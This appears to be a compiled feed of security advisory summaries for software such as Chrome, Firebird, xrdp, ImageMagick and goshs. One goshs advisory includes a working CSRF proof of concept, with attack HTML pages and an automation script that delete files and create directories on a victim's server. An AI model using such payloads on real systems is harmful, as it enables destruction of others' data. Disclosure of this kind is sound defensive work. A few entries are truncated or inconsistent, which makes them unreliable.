rrweb-snapshot before v2.0.0-alpha.18 contains a reflected cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript or HTML in a victim's browser context through a crafted payload. The vulnerability requires user interaction (clicking a malicious link) and affects client-side snapshot capture functionality. Publicly available exploit code exists according to CISA SSVC assessment, though active exploitation has not been confirmed at time of analysis.
Out-of-bounds read in The Sleuth Kit through 4.14.0 allows local attackers with user interaction to disclose sensitive information via a crafted ISO9660 image, exploiting the parse_susp() function's failure to validate field lengths before copying SUSP extension data into stack buffers. The vulnerability can also trigger infinite parsing loops with malformed zero-length SUSP entries. Patch available from upstream repository.
Out-of-bounds read in Sleuth Kit through version 4.14.0 allows local attackers to disclose heap memory or crash the application via a malicious APFS disk image with crafted length fields in the keybag parser. The vulnerability requires user interaction to process the malicious image but affects all Sleuth Kit tools that parse APFS volumes, with a public fix available on GitHub.
Path traversal in The Sleuth Kit (tsk_recover) through version 4.14.0 allows local attackers to write files outside intended recovery directories via malicious filesystem images. Crafted filenames with ../ sequences in processed disk images can overwrite arbitrary files, enabling potential code execution through shell configuration or cron file manipulation. Exploitation requires user interaction (processing attacker-supplied filesystem image). No public exploit identified at time of analysis.
Google Chrome prior to version 147.0.7727.55 contains an information disclosure vulnerability in the Navigation component that allows a remote attacker with a compromised renderer process to leak cross-origin data via a crafted HTML page. The vulnerability requires user interaction and only affects confidentiality (CVSS 4.3), with an extremely low EPSS score of 0.03% indicating minimal real-world exploitation probability despite the unauthenticated attack vector.
Out-of-bounds memory read in Google Chrome's media subsystem (versions prior to 147.0.7727.55) enables remote attackers to disclose sensitive information and trigger denial-of-service conditions via malicious video files. Exploitation requires user interaction (opening/playing crafted video content). Attack vector is network-based with low complexity and no authentication required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.03%, 10th percentile).
Omnibox spoofing in Google Chrome on Android prior to version 147.0.7727.55 allows remote attackers to deceive users by displaying falsified URL bar contents through a crafted HTML page, enabling phishing and social engineering attacks without requiring user interaction beyond visiting a malicious site. Despite a low CVSS score of 4.3 and minimal EPSS exploitation probability (0.03%), the vulnerability has real-world impact because attackers can trick users into believing they are on legitimate domains while actually on attacker-controlled pages.
Domain spoofing via incorrect security UI in Google Chrome on Windows prior to version 147.0.7727.55 allows unauthenticated remote attackers to deceive users through crafted HTML pages that exploit flawed permission display mechanisms. The attack requires user interaction (clicking or viewing a malicious page) but carries moderate real-world risk due to low EPSS exploitation probability (0.03%, 7th percentile) despite the high CVSS impact score, suggesting the vulnerability requires specific user actions or conditions to successfully exploit.
Heap corruption via malicious Chrome extension exploits use-after-free flaw in V8 JavaScript engine, affecting Chrome versions prior to 147.0.7727.55. Attacker must convince user to install a crafted extension to achieve potential remote code execution with high confidentiality, integrity, and availability impact. EPSS score of 0.01% (1st percentile) indicates minimal observed exploitation activity; no CISA KEV listing or public exploit code identified at time of analysis. Despite high CVSS 8.8
Bypass of iframe sandbox navigation restrictions in Google Chrome prior to version 147.0.7727.55 allows remote attackers to circumvent security boundaries via a crafted HTML page combined with specific user UI gestures. The vulnerability affects the IFrameSandbox security mechanism, which is designed to prevent iframes from navigating the top-level window; successful exploitation requires user interaction but results in direct integrity impact through unauthorized navigation. This is a low-severity issue with minimal exploitation probability (EPSS 0.02%, percentile 3%) and no confirmed active exploitation.
Media stream metadata corruption in Google Chrome for Android prior to 147.0.7727.55 enables remote attackers who have already compromised the renderer process to corrupt media stream metadata via a race condition (CWE-362) in the Media component. Despite a critical CVSS 9.8 score with network-accessible attack vector, real-world exploitation requires pre-compromise of the renderer, and EPSS probability is very low (0.03%, 9th percentile). Vendor patch released in Chrome 147.0.7727.55. No public exploit or active exploitation (KEV) identified at time of analysis. Chromium rates this Low severity, contrasting sharply with the theoretical CVSS rating.
Insufficient policy enforcement in Google Chrome's DevTools allows unauthenticated attackers who convince users to install a malicious extension to bypass enterprise host restrictions and modify cookies, affecting Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction to install the malicious extension but grants attackers the ability to circumvent security policies protecting sensitive cookie data. With an EPSS score of 0.01% and Chromium severity rated as Low, real-world exploitation is unlikely despite the moderate CVSS score of 6.5.
Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the Downloads feature that allows remote attackers to circumvent multi-download protections through a crafted HTML page. The vulnerability requires user interaction (clicking or accepting a download), affects integrity only (no code execution or availability impact), and carries a low Chromium severity rating. EPSS exploitation probability is minimal at 0.02% (3rd percentile), indicating this is primarily a user-experience or policy-enforcement issue rather than a critical security risk.
Insufficient policy enforcement in History Navigation in Google Chrome prior to version 147.0.7727.55 enables cross-site scripting (UXSS) attacks when users perform specific UI gestures on attacker-controlled pages, allowing injection of arbitrary scripts or HTML with potential impact on user data confidentiality and integrity. The vulnerability affects all Chrome versions before 147.0.7727.55 across all platforms, requires user interaction with specific UI gestures but no authentication, and carries a low Chromium severity rating despite a moderate CVSS score. No public exploit code has been identified at the time of analysis, though the vulnerability was tracked via Chromium issue tracking.
UI spoofing in Google Chrome on iOS prior to version 147.0.7727.55 allows remote attackers to deceive users through malicious HTML pages that manipulate the Omnibox security indicator, enabling phishing or credential theft without code execution. The vulnerability requires user interaction and has low confidentiality impact, reflected in both the CVSS score of 4.3 and minimal EPSS score of 0.03%, indicating limited real-world exploitation likelihood despite public discoverability.
UI spoofing in Google Chrome's Downloads interface prior to version 147.0.7727.55 allows remote attackers to deceive users into performing unintended actions via crafted HTML pages exploiting incorrect security UI rendering. The vulnerability requires user interaction with specific UI gestures on a malicious webpage, resulting in limited integrity impact through visual deception rather than code execution or data exfiltration. Although marked as low severity by Chromium and carrying minimal exploitation probability (EPSS 0.03%), the attack surface is broad given Chrome's prevalence as a target for social engineering.
Google Chrome prior to version 147.0.7727.55 contains a sandbox bypass vulnerability in the Audio subsystem that allows remote attackers to circumvent download policy restrictions by convincing users to perform specific UI gestures on a crafted HTML page. The vulnerability has low practical exploitability (EPSS 0.02%) and requires active user interaction, limiting real-world risk despite cross-origin scope impact.
Google Chrome on iOS prior to version 147.0.7727.55 contains an Omnibox (URL bar) spoofing vulnerability that allows remote attackers to display misleading domain names to users through crafted domains, potentially enabling phishing attacks. The vulnerability requires user interaction (clicking a link) and affects iOS-specific browser UI rendering. While assigned a low Chromium security severity and rated 5.4 CVSS, the practical exploitation probability remains minimal (0.03% EPSS) due to the high user-interaction requirement and limited information-disclosure impact.
Google Chrome prior to version 147.0.7727.55 contains an inappropriate PDF implementation that allows remote attackers to bypass navigation restrictions via a crafted HTML page. The vulnerability requires user interaction to trigger and offers low real-world risk, with an EPSS score of 0.02% (3rd percentile) indicating minimal exploitation probability despite its network-accessible attack vector. A vendor-released patch is available.
Remote code execution in Google Chrome prior to 147.0.7727.55 exploits a race condition in the V8 JavaScript engine to corrupt heap memory via crafted HTML, requiring user interaction. The vulnerability affects all Chrome versions below 147.0.7727.55 across all platforms via the CPE cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*. No public exploit code or active exploitation has been confirmed at time of analysis, though the Chromium security team rated it medium severity; EPSS scoring at 0.03% (9th percentile) indicates low real-world exploitation probability despite the high CVSS score of 6.8.
Insufficient policy enforcement in PWA installation within Google Chrome prior to version 147.0.7727.55 allows a local attacker with renderer process compromise to install a Progressive Web App without user consent via a crafted HTML page. This vulnerability requires prior compromise of the renderer process and user interaction, resulting in high integrity and availability impact. The issue carries a low real-world exploitation probability (EPSS 0.03%), reflecting the significant prerequisites needed to trigger the vulnerability.
UI spoofing in Google Chrome prior to version 147.0.7727.55 allows remote attackers with a compromised renderer process to deceive users through crafted HTML pages. The vulnerability requires prior renderer compromise, limiting real-world exploitation to scenarios where an attacker has already achieved code execution within the browser's sandboxed rendering context. No active exploitation confirmed; EPSS score of 0.03% indicates minimal exploitation probability.
Cryptographic weakness in PDFium allows unauthenticated remote attackers to decrypt and read sensitive information from password-protected PDFs through brute-force attacks when users view malicious or compromised PDF files in Google Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction (opening a PDF) but combines weak cryptographic design (CWE-326) with low attack complexity, making it feasible for attackers to extract confidential content from encrypted documents. EPSS score of 0.01% indicates minimal real-world exploitation likelihood despite Chromium's medium severity classification.
Information disclosure in Google Chrome prior to 147.0.7727.55 allows remote attackers to read sensitive process memory through the WebCodecs API via a crafted HTML page. Exploitation requires user interaction (UI:R) to visit a malicious webpage but grants high-confidence memory access. The vulnerability has low real-world exploitation probability (EPSS 0.03%) despite satisfying network-accessible conditions, likely due to unreliable memory content extraction and WebCodecs' limited practical attack surface in typical user workflows.
Google Chrome on Windows prior to version 147.0.7727.55 fails to properly validate user input in the Downloads functionality, allowing remote attackers to bypass download restrictions through a crafted HTML page. The vulnerability requires user interaction (clicking a link or visiting a malicious page) but has low real-world impact-it enables integrity bypass only, not code execution or confidentiality breaches. No public exploit code or active exploitation has been identified; the low EPSS score (0.02%) reflects minimal practical risk despite the network attack vector.
Out-of-bounds read in xrdp RDP server versions ≤0.10.5 allows remote unauthenticated attackers to crash the service or disclose process memory by sending a malformed Confirm Active PDU during RDP capability negotiation. Attack complexity is low but requires user interaction. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis. Vendor-released patch available in version 0.10.6 per GitHub security advisory GHSA-rvh9-9wm3-28c7.
Heap-based buffer overflow in xrdp's NeutrinoRDP module (versions ≤0.10.5) enables malicious downstream RDP servers or MitM attackers to achieve remote code execution or denial of service when proxying RDP sessions. Exploitation requires the victim xrdp server to have the non-default NeutrinoRDP module compiled and enabled (--enable-neutrinordp), and a user must initiate an RDP session through the affected proxy to a malicious server. EPSS data unavailable; no CISA KEV listing indicates targeted rather than widespread exploitation. Fixed in version 0.10.6.
Missing MAC signature verification in xrdp 0.10.5 and earlier allows man-in-the-middle attackers to modify encrypted RDP traffic without detection when Classic RDP Security layer is used. Unauthenticated network attackers with MITM position can alter packet contents in transit, achieving high integrity and confidentiality impact on both vulnerable and subsequent systems (CVSS 9.3, CVSS:4.0 with scope change). TLS security layer deployments are not affected. Vendor patch released in version 0.10.6. No active exploitation or public POC identified at time of analysis, but EPSS data unavailable for risk assessment.
Privilege escalation to root in xrdp 0.10.5 and earlier allows authenticated local attackers to execute arbitrary code due to improper error handling during privilege drop in the session execution component. The flaw requires low attack complexity and no user interaction (CVSS 8.8, AV:L/AC:L/PR:L/UI:N). Vendor-released patch available in xrdp v0.10.6. No public exploit or active exploitation confirmed at time of analysis, though CVSS scope change (S:C) indicates potential container/VM escape scenarios.
Remote code execution in Firebird RDBMS versions prior to 5.0.4, 4.0.7, and 3.0.14 allows authenticated users with CREATE FUNCTION privileges to execute arbitrary code as the database server process through path traversal in the external engine plugin loader. The vulnerability stems from insufficient input validation (CWE-22) when concatenating user-supplied engine names into filesystem paths, enabling attackers to load malicious shared libraries from arbitrary locations. With CVSS 10.0 and scope change (S:C), successful exploitation grants full system compromise beyond database boundaries. EPSS data not provided, no CISA KEV listing identified, indicating targeted rather than widespread exploitation at time of analysis. Vendor-released patches available across all affected major versions.
Firebird database server crashes via crafted slice packet exploiting zero-length SDL descriptor validation flaw. Remote unauthenticated attackers can trigger division-by-zero errors in the sdl_desc() function to cause denial of service against Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates trivial remote exploitation with no authentication required. EPSS data not available; no public exploit identified at time of analysis, though technical details in GitHub advisory may facilitate reproduction.
Remote denial-of-service in Firebird Database Server versions prior to 5.0.4, 4.0.7, and 3.0.14 allows unauthenticated network attackers to crash the server via crafted XDR-encoded op_response packets. The xdr_status_vector() function fails to handle isc_arg_cstring status vector types during packet decoding, triggering immediate server termination. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) and CWE-228 (Improper Handling of Syntactically Invalid Structure), this represents a high-severity availability risk for internet-exposed Firebird instances. No active exploitation confirmed, but exploit development is trivial given the low attack complexity.
Buffer overflow in Firebird RDBMS allows remote unauthenticated attackers to crash database servers via malformed slice packets. Affects Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14 across all three maintained major release branches. The xdr_datum() deserialization function fails to validate cstring lengths against slice descriptor bounds during packet processing, enabling heap buffer overflow. CVSS 7.5 (High) with network attack vector and no authentication required. EPSS data not available, no KEV listing identified, but public vendor advisory and tagged releases confirm the issue and provide specific fix versions.
Null pointer dereference in Firebird SQL server causes remote denial-of-service when unauthenticated attackers send malformed op_crypt_key_callback packets. Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14 are affected. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms trivial remote exploitation requiring no authentication or user interaction, allowing attackers who know only the server's IP and port to crash database services. The integrity impact rating (I:L) suggests potential for limited data corruption alongside the high availability impact. Vendor-released patches are available in versions 5.0.4, 4.0.7, and 3.0.14. No public exploit code or CISA KEV listing identified at time of analysis, though the low attack complexity makes weaponization straightforward.
Integer overflow in Firebird database versions prior to 5.0.4, 4.0.7, and 3.0.14 allows authenticated users with INSERT privileges to trigger a denial of service via a malformed Batch Parameter Block that overflows the totalLength value in ClumpletReader::getClumpletSize(), causing infinite loop conditions on the server.
Remote denial-of-service in Firebird database server versions prior to 5.0.4, 4.0.7, and 3.0.14 allows unauthenticated network attackers to crash the server via malformed authentication packets. Exploitable by sending out-of-order CNCT_specific_data segments during connection setup, triggering a negative size calculation and segmentation fault. No authentication, credentials, or special configuration required - only knowledge of server IP and port. CVSS 8.2 (High) with network vector, low complexity, and no privileges required. No public exploit code or active exploitation (CISA KEV) identified at time of analysis, though the attack surface is maximally exposed given the unauthenticated network vector and low complexity (AV:N/AC:L/PR:N).
Remote unauthenticated denial of service in Firebird SQL database server versions prior to 6.0.0/5.0.4/4.0.7/3.0.14 allows attackers to crash the database by sending a malformed op_slice network packet that triggers a null pointer dereference in the SDL_info() function. Attack requires only network access to the database port with no authentication (CVSS AV:N/AC:L/PR:N). No public exploit code identified at time of analysis, and EPSS data not available for this recent CVE. Fixed versions released by vendor across all maintained branches.
Information disclosure in Firebird 3.x client library when connecting to Firebird 4+ servers allows local authenticated users to leak sensitive data through incorrect XSQLDA field length values. The vulnerability requires both the FB3 client library and an FB4+ server in the deployment. No active exploitation confirmed (not in CISA KEV), but CVSS 7.9 with scope change (S:C) indicates potential cross-boundary impact. Remediation requires upgrading the client library to Firebird 4.0.0 or higher.
Out-of-bounds write in dnsmasq's DHCP split-relay handler allows remote unauthenticated denial of service via crafted BOOTREPLY packets. Affects Red Hat Enterprise Linux 6-10 and OpenShift Container Platform 4 when dnsmasq runs with the --dhcp-split-relay option enabled. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates trivial network exploitation, but real-world risk is mitigated by the non-default configuration requirement. No public exploit or active exploitation (CISA KEV) confirmed at time of analysis, though CWE-787 (out-of-bounds write) primitives are well-understood by attackers.
Insuffient checks of the RMP on host buffer access in IOMMU may allow an attacker with privileges and a compromised HV to trigger an out of bounds condition without RMP checks resulting in a. Rated medium severity (CVSS 5.6).
A NULL pointer dereference vulnerability exists in fio (Flexible I/O Tester) v3.41 when parsing job files containing the fdp_pli option. The callback function str_fdp_pli_cb() does not validate the input pointer and calls strdup() on a NULL value when the option is specified without an argument. This results in a segmentation fault and process crash.
Command injection in radare2's rabin2 PDB parser allows local attackers to execute arbitrary commands when the tool is compiled without SSL support on UNIX systems. The vulnerability (CWE-78) affected a narrow window between commits 01ca2f6 and 9236f44 (post-6.1.2, pre-6.1.3), spanning less than one week in the development timeline. CVSS 7.4 (HIGH) reflects local attack vector with high complexity but no authentication required. No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists. EPSS data not provided. Fixed in commit 9236f44a28 per GitHub PR #25651.
Logic error in Luanti 5 (formerly Minetest) game engine before 5.15.2 allows malicious mods to gain unauthorized access to security-restricted APIs by intercepting mod environment setup. When any mod is designated as trusted (via secure.trusted_mods or secure.http_mods), a specially crafted mod can exploit the environment initialization sequence to receive the insecure environment or HTTP API access intended only for trusted mods. CVSS 8.1 reflects local attack vector with high complexity but no authentication required and scope change with high confidentiality/integrity/availability impact. GitHub security advisory and two fix commits confirm patch availability. No CISA KEV listing or public exploit code identified at time of analysis.
Cross-site scripting (XSS) in ApostropheCMS 4.28.0 and sanitize-html 2.17.1 allows remote attackers to bypass HTML tag filtering and inject arbitrary tags through entity-encoded payloads in textarea and option elements. A regression in the sanitize-html parser incorrectly assumes htmlparser2 does not decode entities within non-text elements, causing encoded HTML to be decoded and written directly to output without sanitization. Exploitation requires non-default configurations where textarea or option tags are in the allowedTags list, commonly found in form builders, and user interaction to submit form content. No active exploitation has been identified at time of analysis, but the vulnerability is trivial to exploit once configuration conditions are met.
### Summary A denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections. ### Details Two inefficient multipart parsing paths could be abused with attacker-controlled input. Before the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary. ### Impact An attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application. ### Mitigation Upgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.
A flaw was found in FFmpeg. A remote attacker could exploit this vulnerability by providing a specially crafted MPEG-PS/VOB media file containing a malicious DVD subtitle stream. This vulnerability is caused by a signed integer overflow in the DVD subtitle parser's fragment reassembly bounds checks, leading to a heap out-of-bounds write. Successful exploitation can result in a denial of service (DoS) due to an application crash, and potentially lead to arbitrary code execution.
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Video in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit termination, it results in an out-of-bounds read when processed by functions like snprintf(). A local attacker could potentially trigger this vulnerability by initiating a crafted passkey authentication request, causing the SSSD PAM responder to crash, resulting in a local Denial of Service (DoS).
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized access to subresources, potentially disclosing sensitive information or performing actions they are not permitted to do. Additionally, legitimate users may be denied access to resources.
### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Authorization bypass in sigstore/timestamp-authority verifier allows attackers to prepend forged certificates to PKCS#7 certificate bags, causing the library to validate signatures with one certificate while performing authorization checks on another. The vulnerability affects the `VerifyTimestampResponse` function in timestamp-authority/v2/pkg/verification, enabling attackers to bypass authorization controls on timestamp verification. This impacts only library consumers, not the timestamp-authority service itself, and sigstore-go is unaffected due to its use of the `TSACertificate` mitigation option. EPSS 5.5, actively exploitable via local interaction.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, an off by one error in the MSL decoder could result in a crash when a malicous MSL file is read. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below 7.1.2-19 and 6.9.13-44 contain a heap use-after-free vulnerability that can cause a crash when reading and printing values from an invalid XMP profile. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below both 7.1.2-19 and 6.9.13-44, contain a heap out-of-bounds write in the JP2 encoder with when a user specifies an invalid sampling index. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, the JXL encoder has an heap write overflow when a user specifies that the image should be encoded as 16 bit floats. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, a crafted image could result in an out of bounds heap write when writing a yaml or json output, resulting in a crash. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the -sample operation has an out of bounds read when an specific offset is set through the `sample:offset` define that could lead to an out of bounds read. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a stack overflow vulnerability in ImageMagick's FX expression parser allows an attacker to crash the process by providing a deeply nested expression. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
When `Magick` parses an XML file it is possible that a single zero byte is written out of the bounds.
An integer overflow in the despeckle operation causes a heap buffer overflow on 32-bit builds that will result in an out of bounds write. ``` ==1551685==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xea2fb818 at pc 0x56cbc42a bp 0xffc4ce48 sp 0xffc4ce38 WRITE of size 8 at 0xea2fb818 thread T0 ```
In viff encoder contains an integer truncation/wraparound issue on 32-bit builds that could trigger an out of bounds heap write that can result in a crash.
Null pointer dereference in the Linux kernel's RDS-over-InfiniBand (RDS/IB) subsystem allows a local low-privileged user to crash the kernel by sending an RDS_CMSG_RDMA_MAP control message before an IB connection is fully established. The impact is a complete denial of service (kernel panic) with no confidentiality or integrity exposure, scoring CVSS 5.5. No public exploit code has been identified at time of analysis, and EPSS exploitation probability is extremely low at 0.02%, consistent with the specialized InfiniBand hardware prerequisite.
Integer underflow in libexif version 0.6.25 and earlier during Fuji and Olympus MakerNote decoding allows local attackers to crash applications or leak sensitive memory information. The vulnerability requires local access and specific user interaction (high complexity) but affects all applications linking libexif, creating a supply-chain exposure for image processing tools.
Integer overflow in libexif through 0.6.25 Nikon MakerNote handling allows local attackers on 32-bit systems to trigger crashes or read sensitive memory, requiring high attack complexity and no user interaction. This affects only 32-bit architectures due to the integer arithmetic involved; EPSS probability is low given the local-only attack vector and high complexity prerequisite, but patch availability is currently unconfirmed.
Local privilege escalation in KeePassXC password manager allows authenticated attackers with low privileges to execute arbitrary code by exploiting insecure OpenSSL configuration file loading. When a target user launches KeePassXC, malicious configuration planted in an unsecured path is loaded, enabling code execution in KeePassXC's security context. Attack requires user interaction and prior low-privileged access. CVSS 7.3 (AV:L/AC:L/PR:L/UI:R). No public exploit identified at time of analysis.
Critical authorization bypass in goshs (Go-based HTTP server) versions prior to 2.0.0-beta.4 allows unauthenticated attackers to upload, delete, and modify files in directories protected by .goshs ACL configurations. Attackers can execute state-changing operations (PUT uploads, POST /upload, directory creation via ?mkdir, file deletion via ?delete) without credentials, bypassing documented per-folder authentication mechanisms. Deleting the .goshs file itself removes authentication policies, enabling unrestricted access to previously protected content. Affects confidentiality, integrity, and availability of protected resources. No public exploit identified at time of analysis.
Path traversal in patrickhener goshs SFTP rename operation enables authenticated attackers to write files outside the configured root directory. Versions 1.0.7 through 2.0.0-beta.3 fail to sanitize destination paths in SFTP rename commands, allowing low-privileged users to overwrite arbitrary filesystem locations with network access. High integrity impact with scope change indicates potential host compromise. No public exploit identified at time of analysis.
